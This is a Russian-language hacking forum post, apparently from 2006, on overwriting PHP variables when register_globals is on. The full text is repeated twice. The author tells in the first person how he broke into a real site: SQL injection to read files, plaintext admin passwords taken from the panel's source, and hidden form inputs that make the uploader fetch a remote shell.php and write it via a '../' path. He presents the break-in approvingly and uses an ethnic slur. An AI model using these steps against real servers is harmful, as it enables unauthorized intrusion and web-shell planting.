LoFFi
12.11.2006, 18:18
register_globals [ON]
Подмена переменных
--------------------------------------------------------------
Вступление
Совсем недавно я столкнулся с весьма необычным взломом. Необычным, потому что обычные методы, мне не помогли. Поэтому я решил поделится с вами этим методом, так как, я считаю, он имеет право на существование.
Теория
Как известно в пхп есть такая вещь как register_globals. Вдруг кто не знает - я объясню что это такое.
Register_globals - это одна из установок php.ini которая при ее включении позволяет регистрировать глобальные переменные. Ну это если дословно.
На практике же это собой представляет:
Можно передавать данные между скриптами методами GET или POST, но чтобы принять переменную, в скрипте должна быть строка
$i = $_GET['i'];
Данный код говорит о том, что для данного скрипта создана переменная $i, и в неё записаны данные переменной 'i' переданной скрипту методом GET.
Но если включен register_globals, но данная строка не нужна! При передачи скрипту какой либо переменной, если ее название будет совпадать с уже существующей, то оно ее просто заменит.
То есть если есть такой скрипт:
<?
echo $i;
?>
и есть html файл
<form action='script.php' method=POST>
<input type=hidden name='i' value='123'>
<input type=submit value='ok'>
</form>
То при его исполнении пхп скрипт выдаст на экран 123
Из жизни...
Как я уже говорил, недавно я встретился с таким вот взломом. Ресурс был давольно крупный, но с достаточно тупыми багами. Там была MySQL Injection и к моему счастью file_priv был [ON]
Я мог читать файлы. Недолго думая я проверил таблицы, и нашел таблицу admins, но радость моя была не долгой - хеши были какие-то еврейские.
Админку я нашел абсолютно случайно, в очень редком и непредвиденном для нее месте http://site.com/admin/
Меня приветсвовал скрипт предлагающий выбрать юзера из комбобокса, и ввести пасс к нему. Недолго думая я прочитал сурс админки - пассы лежали в чистом виде.
Теперь я мог добавлять новости и АПЛОАДИТЬ КАРТИНКИ. Более того, скрипт даже не проверял расширение файла, НО почему то я увидел вверху страницы надпись:
Warning: copy(/images/shell.php) [function.copy]: failed to open stream: No such file or directory in...
то есть просто не существовало такой диры.
Я решил почитать сурс аплоадера. там я увидел примерно такой код:
...
if(isset($file))
{
copy($file,"/images/".$file_name);
}
...
Далее просто я решил подменить переменные.
Для этого я создал HTML файл, и вписал туда.
<input type=hidden name="file" value="http://www.site.com/shell.php">
<input type=hidden name="file_name" value="../shell.php">
Запустил с локалхоста... Шелл уже ждал меня на сервере...
Вывод
Конечно в реальной истории было все намного сложнее и запутанней, но здесь я привел лишь модель.
Смысл баги в том, что, как правило, разработчики не предвидят возможность "плохого" использования register_globals а так как помоему на всех хостингах сейчас register_globals ON, то в определенных ситуациях это может нести смертельную опасность для безопасности скриптов.
--------------------------------------------------------------------
LoFFi (c)
Подмена переменных
--------------------------------------------------------------
Вступление
Совсем недавно я столкнулся с весьма необычным взломом. Необычным, потому что обычные методы, мне не помогли. Поэтому я решил поделится с вами этим методом, так как, я считаю, он имеет право на существование.
Теория
Как известно в пхп есть такая вещь как register_globals. Вдруг кто не знает - я объясню что это такое.
Register_globals - это одна из установок php.ini которая при ее включении позволяет регистрировать глобальные переменные. Ну это если дословно.
На практике же это собой представляет:
Можно передавать данные между скриптами методами GET или POST, но чтобы принять переменную, в скрипте должна быть строка
$i = $_GET['i'];
Данный код говорит о том, что для данного скрипта создана переменная $i, и в неё записаны данные переменной 'i' переданной скрипту методом GET.
Но если включен register_globals, но данная строка не нужна! При передачи скрипту какой либо переменной, если ее название будет совпадать с уже существующей, то оно ее просто заменит.
То есть если есть такой скрипт:
<?
echo $i;
?>
и есть html файл
<form action='script.php' method=POST>
<input type=hidden name='i' value='123'>
<input type=submit value='ok'>
</form>
То при его исполнении пхп скрипт выдаст на экран 123
Из жизни...
Как я уже говорил, недавно я встретился с таким вот взломом. Ресурс был давольно крупный, но с достаточно тупыми багами. Там была MySQL Injection и к моему счастью file_priv был [ON]
Я мог читать файлы. Недолго думая я проверил таблицы, и нашел таблицу admins, но радость моя была не долгой - хеши были какие-то еврейские.
Админку я нашел абсолютно случайно, в очень редком и непредвиденном для нее месте http://site.com/admin/
Меня приветсвовал скрипт предлагающий выбрать юзера из комбобокса, и ввести пасс к нему. Недолго думая я прочитал сурс админки - пассы лежали в чистом виде.
Теперь я мог добавлять новости и АПЛОАДИТЬ КАРТИНКИ. Более того, скрипт даже не проверял расширение файла, НО почему то я увидел вверху страницы надпись:
Warning: copy(/images/shell.php) [function.copy]: failed to open stream: No such file or directory in...
то есть просто не существовало такой диры.
Я решил почитать сурс аплоадера. там я увидел примерно такой код:
...
if(isset($file))
{
copy($file,"/images/".$file_name);
}
...
Далее просто я решил подменить переменные.
Для этого я создал HTML файл, и вписал туда.
<input type=hidden name="file" value="http://www.site.com/shell.php">
<input type=hidden name="file_name" value="../shell.php">
Запустил с локалхоста... Шелл уже ждал меня на сервере...
Вывод
Конечно в реальной истории было все намного сложнее и запутанней, но здесь я привел лишь модель.
Смысл баги в том, что, как правило, разработчики не предвидят возможность "плохого" использования register_globals а так как помоему на всех хостингах сейчас register_globals ON, то в определенных ситуациях это может нести смертельную опасность для безопасности скриптов.
--------------------------------------------------------------------
LoFFi (c)